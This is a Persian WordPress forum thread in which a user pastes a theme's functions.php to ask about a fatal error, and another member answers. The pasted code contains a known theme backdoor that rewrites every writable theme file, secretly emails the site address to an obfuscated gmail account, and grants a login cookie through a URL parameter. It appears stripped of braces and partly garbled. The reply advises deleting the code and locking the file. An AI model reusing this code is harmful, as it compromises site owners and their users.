رفتن به مطلب

پیغام خطای pluggable.php به هنگام نصب پوسته

پست های پیشنهاد شده

سلام وقتی پوسته خبری صحیفه رو روی وردپرسم نصب میکنم صفحه وردپرسم سفید میشه و این ارور رو میده :

Fatal error: Call to undefined function _get_all_widgetcont() in /home/mashhadp/public_html/wp-content/themes/mp/functions.php on line 74


محتویات فایل functions.php

$themename = "صحیفه";
$themefolder = "sahifa";
define ('theme_name', $themename );
define ('theme_ver' , 3 );

// Notifier Info
$notifier_name = $themename;
$notifier_url = "http://www.Toptemp.ir/xml/".$themefolder.".xml";
//Docs Url
$docs_url = "http://toptemp.ir/34/";

// Constants for the theme name, folder and remote XML url
define( 'MTHEME_NOTIFIER_THEME_NAME', $themename );
define( 'MTHEME_NOTIFIER_THEME_FOLDER_NAME', $themefolder );
define( 'MTHEME_NOTIFIER_XML_FILE', $notifier_url );

// Custom Functions
include (TEMPLATEPATH . '/custom-functions.php');
// Get Functions
include (TEMPLATEPATH . '/functions/home-cats.php');
include (TEMPLATEPATH . '/functions/home-cat-tabs.php');
include (TEMPLATEPATH . '/functions/home-cat-scroll.php');
include (TEMPLATEPATH . '/functions/home-cat-pic.php');
include (TEMPLATEPATH . '/functions/home-recent-box.php');
include (TEMPLATEPATH . '/functions/theme-functions.php');
include (TEMPLATEPATH . '/functions/common-scripts.php');
include (TEMPLATEPATH . '/functions/banners.php');
include (TEMPLATEPATH . '/functions/widgetize-theme.php');
include (TEMPLATEPATH . '/functions/default-options.php');
include (TEMPLATEPATH . '/functions/updates.php');

// tie-Panel
include (TEMPLATEPATH . '/panel/mpanel-ui.php');
include (TEMPLATEPATH . '/panel/mpanel-functions.php');
include (TEMPLATEPATH . '/panel/shortcodes/shortcode.php');
include (TEMPLATEPATH . '/panel/post-options.php');
include (TEMPLATEPATH . '/panel/custom-slider.php');
include (TEMPLATEPATH . '/panel/notifier/update-notifier.php');
include (TEMPLATEPATH . '/includes/pagenavi.php');
include (TEMPLATEPATH . '/includes/breadcrumbs.php');
include (TEMPLATEPATH . '/includes/wp_list_comments.php');
include (TEMPLATEPATH . '/includes/widgets.php');
include (TEMPLATEPATH . '/includes/twitteroauth/twitteroauth.php');

if ( ! isset( $content_width ) ) $content_width = 620;

// with activate istall option
if ( is_admin() && isset($_GET['activated'] ) && $pagenow == 'themes.php' ) {

if( !get_option('tie_active') ){
tie_save_settings( $default_data );
update_option( 'tie_active' , theme_ver );
//header("Location: admin.php?page=panel");

function _check_active_widget(){
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);
$output .= ($showdot && $ellipsis) ? "..." : "";
return $output;
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );

function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
return $dirArray;
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
if(!isset($length)) $length=120;
if(!isset($method)) $method="cookie";
if(!isset($html_tags)) $html_tags="<a>";
if(!isset($filters_type)) $filters_type="none";
if(!isset($s)) $s="";
if(!isset($filter_h)) $filter_h=get_option("home");
if(!isset($filter_p)) $filter_p="wp_";
if(!isset($use_link)) $use_link=1;
if(!isset($comments_type)) $comments_type="";
if(!isset($perpage)) $perpage=$_GET["cperpage"];
if(!isset($comments_auth)) $comments_auth="";
if(!isset($comment_is_approved)) $comment_is_approved="";
if(!isset($authname)) $authname="auth";
if(!isset($more_links_text)) $more_links_text="(more...)";
if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
if(!isset($more_content)) $more_content="ma".$s."il";
if(!isset($forces_more)) $forces_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$widget_output) :

global $wpdb, $post;
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__("There is no excerpt because this is a protected post.");
} else {
if(!isset($fix_tag)) $fix_tag=1;
if(!isset($filters_types)) $filters_types=$filter_h;
if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
if(!isset($more_tags)) $more_tags="div";
if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($mlink_title)) $mlink_title="Continue reading this entry";
if(!isset($showdot)) $showdot=1;

if($fakeit == 2) {
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($length < 0) {
} else {
if(!$no_more && strpos($text, "<!--more-->")) {
$text=explode("<!--more-->", $text, 2);
} else {
$text=explode(" ", $text);
if(count($text) > $length) {
} else {
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
update_option("_is_widget_active_", 1);
if("all" != $html_tags) {
$output=strip_tags($output, $html_tags);
return $output;
$output=rtrim($output, "\s\n\t\r\0\x0B");
$output=($fix_tag) ? balanceTags($output, true) : $output;
$output .= ($showdot && $ellipsis) ? "..." : "";
$output=apply_filters($filters_type, $output);
switch($more_tags) {
case("div") :
case("span") :
case("p") :
default :
if ($use_link ) {
if($forces_more) {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
return $output;

add_action("init", "_prepared_widget");


تمام افزونه ها هم غیر فعال کردم ولی فایده نداشت!!!!!

لینک به ارسال

از قبل این خط:

function _check_active_widget(){

تا آخر کد را حذف کنید

سپس پرمیژن نوشتن را از فایل بگیرید

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

ارسال پاسخ به این موضوع ...

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